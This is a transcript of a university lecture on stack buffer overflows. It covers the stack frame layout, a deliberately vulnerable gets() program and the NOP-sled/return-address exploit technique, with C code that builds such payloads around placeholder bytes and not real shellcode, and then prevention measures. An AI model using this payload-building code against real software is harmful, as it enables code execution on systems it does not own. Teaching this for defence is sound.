BUFFER OVERFLOW - PowerPoint PPT Presentation

Provided by: esw1
Transcript and Presenter's Notes

Title: BUFFER OVERFLOW


1
  • BUFFER OVERFLOW
  • -Eswar Balasubramanian
  • ECE578

2
Precursor
  • How serious is this BO?
  • Number of vulnerabilities in the past week: 11
  • First six vulnerabilities of 2002

3
Agenda
  • BO: what is it?
  • About the stack
  • Exploit
  • Prevention

4
Buffer Overflow
  • Copying more data into a buffer than it can hold
    char variable[10];
    char safe[9]    = "AAAAAAAA";                        /* 8 bytes plus the NUL terminator: fits in variable */
    char unsafe[30] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAA";   /* far longer than variable */
    strcpy(variable, safe);     /* fine */
    strcpy(variable, unsafe);   /* strcpy() never looks at the destination size: every byte past the tenth overwrites whatever follows variable on the stack */

5
Stack
  • Used by functions: each call pushes a return address, saves the caller's frame pointer, then makes room for the callee's local variables
  • Local variables are allocated on the stack at function entry
  • esp and ebp are adjusted accordingly
    /* vulnerable.c */
    int main()
    {
        char buffer[500];
        gets(buffer);        /* no bound: reads until newline or EOF */
        return 0;
    }
  • Frame of main() while gets() writes into buffer (addresses grow upward):

        high addresses
        +----------------------+
        |  ret   (4 bytes)     |  main's saved return address
        +----------------------+
        |  sfp   (4 bytes)     |  saved frame pointer      <- ebp
        +----------------------+
        |  buffer (500 bytes)  |  gets() fills it from the low end upward
        +----------------------+  <- esp after the 500-byte allocation
        low addresses

  • The return address that gets() itself pushes points to main's `return 0`, but it lies below buffer and the overflow never reaches it; what the overflow runs into is main's own sfp and ret, which sit immediately above buffer and are overwritten once more than 500 bytes arrive.
6
What Next?
  • Alter the return address to our liking
  • Place tailor-made code (shellcode) where the altered address points
  • main's frame as the overflow sees it:

        buffer (500)            sfp (4)   ret (4)
        xxxxxxxxxx...xxxxxxxxx  xxxx      xxxx
        <------- 500 ------->   <- 4 ->   <- 4 ->

  • Algorithm
  • Copy one large string into buffer so that it runs past the end and overwrites sfp and ret
  • Overwrite ret so that the return address points to the beginning of buffer
  • When main() returns, the CPU pops the altered ret and jumps to the beginning of buffer
  • Buffer holds the code we want executed, so it now runs with the program's privileges

7
To Do
  • Calculate the return address
  • Construct the large string
  • The return address is estimated from the stack pointer at the time gets() is called: take esp and subtract a guessed offset so that the result lands inside buffer

8
  • Fill the whole string with copies of the return address
  • Overwrite the beginning with NOPs (the slide says about a third; the code on the next slide uses the first half)
  • Insert the tailor-made code (shellcode) after the NOPs
  • Feed the string to the program to overflow the buffer (usually as a command-line argument, or on stdin for vulnerable.c, which reads with gets())

9
    /* SIZE, esp, offset and listDir (the shellcode string) are defined
     * elsewhere in the exploit and are not shown on the slide; ptr is a
     * char *, addr_ptr a long *, i an int. The (long *) cast assumes a
     * 4-byte long on little-endian x86. */
    char buffer[SIZE];
    ret = esp - offset;
    /* fill buffer with ret addr's */
    ptr = buffer;
    addr_ptr = (long *) ptr;
    for (i = 0; i < SIZE; i += 4)
        *(addr_ptr++) = ret;
    /* fill first half of buffer with NOPs */
    for (i = 0; i < SIZE/2; i++)
        buffer[i] = '\x90';
    /* insert shellcode in the middle */
    ptr = buffer + ((SIZE/2) - (strlen(listDir)/2));
    for (i = 0; i < strlen(listDir); i++)
        *(ptr++) = listDir[i];
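The construction on slides 6 to 9, carried through as an added example in C that is not part of the original presentation: it builds the string with the same three-step layout (repeated return address, NOP sled over the first half, shellcode in the middle), generalised to any buffer size and shellcode length, and adds two checks a practitioner wants before sending it: that no byte of the payload is 0x00, because gets(), strcpy() and argv all stop there, and that a guessed return address falls inside the sled. The 64-byte size, the address 0xbffff5c0 and the twelve 0xcc placeholder bytes are assumptions made for the demonstration; no shellcode from the slides is reproduced.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NOP 0x90          /* x86 one-byte no-op that makes up the sled */

/* Offset of the first shellcode byte: the slide centres the shellcode on
 * the midpoint of the string. */
size_t shellcode_offset(size_t size, size_t sc_len)
{
    return size / 2 - sc_len / 2;
}

/* Lay out the exploit string the way the slide's three loops do:
 *   1. fill the whole buffer with copies of ret (4-byte words, little-endian),
 *   2. overwrite the first half with NOPs,
 *   3. place the shellcode in the middle.
 * The ret copies at the tail are what land on sfp and ret in the victim's
 * frame; the sled lets an inexact ret still reach the shellcode.
 * Returns size on success, 0 if the shellcode does not fit. */
size_t build_payload(uint8_t *out, size_t size, uint32_t ret,
                     const uint8_t *shellcode, size_t sc_len)
{
    size_t i;

    if (size < 8 || sc_len > size / 2)
        return 0;
    memset(out, NOP, size);                  /* no byte is left uninitialised */
    for (i = 0; i + 4 <= size; i += 4) {     /* step 1: repeated return address */
        out[i]     = (uint8_t)(ret);
        out[i + 1] = (uint8_t)(ret >> 8);
        out[i + 2] = (uint8_t)(ret >> 16);
        out[i + 3] = (uint8_t)(ret >> 24);
    }
    for (i = 0; i < size / 2; i++)           /* step 2: NOP sled */
        out[i] = NOP;
    memcpy(out + shellcode_offset(size, sc_len), shellcode, sc_len);  /* step 3 */
    return size;
}

/* gets(), strcpy() and argv all stop at the first 0x00, so a return address
 * or shellcode containing a NUL byte cuts the payload short. */
int payload_has_nul(const uint8_t *p, size_t size)
{
    return memchr(p, 0, size) != NULL;
}

/* The guess written into ret only has to land somewhere on the sled: at or
 * after the real start of buffer and no later than the first shellcode byte.
 * buf_addr is where the victim's buffer actually begins. */
int guess_lands_in_sled(uint32_t buf_addr, uint32_t guess,
                        size_t size, size_t sc_len)
{
    if (guess < buf_addr)
        return 0;
    return (size_t)(guess - buf_addr) <= shellcode_offset(size, sc_len);
}

/* Builds a 64-byte example payload around a constructed placeholder: twelve
 * int3 (0xcc) bytes stand in for shellcode, which is not reproduced here.
 * Returns NULL if the layout fails. */
const uint8_t *demo_payload(uint32_t ret)
{
    static uint8_t placeholder[12];
    static uint8_t buf[64];

    memset(placeholder, 0xcc, sizeof placeholder);
    if (build_payload(buf, sizeof buf, ret, placeholder, sizeof placeholder) == 0)
        return NULL;
    return buf;
}

int main(void)
{
    const uint8_t *p = demo_payload(0xbffff5c0);   /* assumed stack address */
    size_t i;

    for (i = 0; p != NULL && i < 64; i++)
        printf("%02x%s", p[i], (i % 16 == 15) ? "\n" : " ");
    printf("contains NUL: %d\n", p ? payload_has_nul(p, 64) : -1);
    return 0;
}
```

The hex dump shows the structure directly: 26 NOPs, 12 placeholder bytes, then return-address words from offset 40 to the end, still 4-byte aligned because the shellcode was dropped over a buffer that was already filled. Trying the same build with a return address such as 0xbffff500 makes payload_has_nul() report the problem before the string is sent.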

10
  • EXECUTION

11
PREVENTION
  • Use the bounded functions strncat(), strncpy(), fgets() in place of strcat(), strcpy(), gets(), and check the result is NUL-terminated: strncpy() writes no terminator when the source is at least as long as the bound
  • StackGuard: a compiler change that places a canary value between the local variables and the saved return address and aborts the program if the canary has changed when the function returns
  • Patch to make the stack non-executable, so that code placed in buffer cannot be run even if ret is overwritten
  • Wrapper libraries that replace the unsafe libc calls with bounds-checked versions
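The first prevention item above, as an added example in C that is not part of the original presentation: the slide's 10-byte `variable` receiving the long string from slide 4, first through strncpy() to show that it can leave the buffer unterminated, then through a copy that always terminates and reports truncation, and finally a gets() replacement built on fgets() for vulnerable.c that also drains the rest of an over-long line. The inputs are constructed for the demonstration; the function names are my own.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 10   /* the slide's char variable[10] */

/* Why "use strncpy()" alone is not a fix: when strlen(src) >= n, strncpy()
 * copies n bytes and writes no terminating NUL, so the next strlen() or
 * printf("%s") on dst reads past its end. Returns 1 if dst was left
 * unterminated. */
int strncpy_leaves_unterminated(char *dst, size_t n, const char *src)
{
    memset(dst, 'X', n);             /* make a missing NUL visible */
    strncpy(dst, src, n);
    return memchr(dst, '\0', n) == NULL;
}

/* Bounded copy that always terminates. Returns strlen(src), so a result
 * >= dst_size tells the caller the copy was truncated (the strlcpy()
 * convention). */
size_t bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src), n;

    if (dst_size == 0)
        return len;
    n = len < dst_size - 1 ? len : dst_size - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return len;
}

/* bounded_copy() into the slide's 10-byte variable; returns that buffer. */
const char *copy_into_variable(const char *src)
{
    static char variable[BUF_SIZE];

    bounded_copy(variable, sizeof variable, src);
    return variable;
}

/* Replacement for the gets() call in vulnerable.c: fgets() reads at most
 * size-1 bytes; the newline is stripped and the rest of an over-long line is
 * drained so it is not mistaken for the next input. Returns 1 if the line
 * was truncated, 0 if it fit, -1 on EOF or error before any byte was read. */
int read_line(FILE *fp, char *buf, size_t size)
{
    size_t len;
    int c, truncated = 0;

    if (size == 0 || fgets(buf, (int)size, fp) == NULL)
        return -1;
    len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 0;
    }
    while ((c = getc(fp)) != EOF && c != '\n')
        truncated = 1;
    return truncated;
}

/* Runs read_line() over a constructed input through a temporary file, using
 * the slide's 10-byte buffer. */
static int run_read_line(const char *input, char *out, size_t size)
{
    FILE *fp = tmpfile();
    int r;

    if (fp == NULL)
        return -1;
    fputs(input, fp);
    rewind(fp);
    r = read_line(fp, out, size);
    fclose(fp);
    return r;
}

int first_line_truncated(const char *input)
{
    char line[BUF_SIZE];
    return run_read_line(input, line, sizeof line);
}

const char *first_line_text(const char *input)
{
    static char line[BUF_SIZE];
    if (run_read_line(input, line, sizeof line) < 0)
        line[0] = '\0';
    return line;
}

int main(void)
{
    const char *big = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAA";   /* the long string from slide 4 */
    char tmp[BUF_SIZE];

    printf("strncpy left it unterminated: %d\n", strncpy_leaves_unterminated(tmp, sizeof tmp, big));
    printf("bounded copy: \"%s\", truncated: %d\n", copy_into_variable(big),
           bounded_copy(tmp, sizeof tmp, big) >= sizeof tmp);
    printf("read_line: \"%s\"\n", first_line_text("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nshort\n"));
    return 0;
}
```

The truncation return values matter as much as the bound: a program that silently keeps the first nine bytes of an attacker's input is safe from the overflow but may still act on a string the user never meant, so callers should check them.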